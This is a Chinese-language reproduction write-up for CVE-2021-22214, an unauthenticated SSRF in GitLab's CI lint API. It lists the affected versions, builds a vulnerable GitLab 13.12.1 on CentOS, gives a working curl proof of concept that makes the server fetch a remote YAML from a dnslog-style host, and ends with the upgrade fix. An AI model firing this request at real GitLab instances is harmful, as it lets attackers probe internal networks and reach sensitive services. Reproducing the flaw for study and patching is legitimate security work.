CVE-2021-22214：Gitlab API未授权SSRF复现

0x01 简介

GitLab是由GitLabInc.开发，使用MIT许可证的基于网络的Git仓库管理工具，具有issue跟踪功能。它使用Git作为代码管理工具，并在此基础上搭建起来的web服务。

0x02 漏洞概述

编号：CVE-2021-22214

Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式。而根据其说明文档文档，其include 操作支持remote选项，用于获取远端的yaml。因此在此处将remote参数设置为本地回环地址，同时由于后端会检查最后扩展名，加上?test.yaml 即可绕过。

远程攻击者可通过发送特殊构造的HTTP请求，欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。

0x03 影响版本

13.10.5 > GitLab >= 10.5

13.11.5 > GitLab >= 13.11

13.12.2 > GitLab >= 13.12

0x04 环境搭建

以阿里云centos7.3为例

首先先添加yum源，选择gitlab-ce社区版

curl -s https://packages.gitlab.com/install/repositories/gitlab/gitlab-ce/script.rpm.sh | sudo bash

接着需要更新下yum缓存

sudo yum makecache

接着获取源中的所有版本

yum list gitlab-ce --showduplicates|sort -r

此时选择存在漏洞的版本安装即可

yum install gitlab-ce-13.12.1-ce.0.el7

下载完成后使用命令gitlab-ctl reconfigure即可默认配置安装gitlab

0x05 漏洞复现

POC为：（使用时修改两处即可）

curl -s --show-error -H 'Content-Type: application/json' http://目标ip或者域名/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n  remote: http://dnslog/api/v1/targets/?test.yml"}'

0x06 修复方式

当前官方已发布最新版本，建议受影响的用户及时更新升级到最新版本：

https://about.gitlab.com/releases/2021/06/01/security-release-gitlab-13-12-2-released/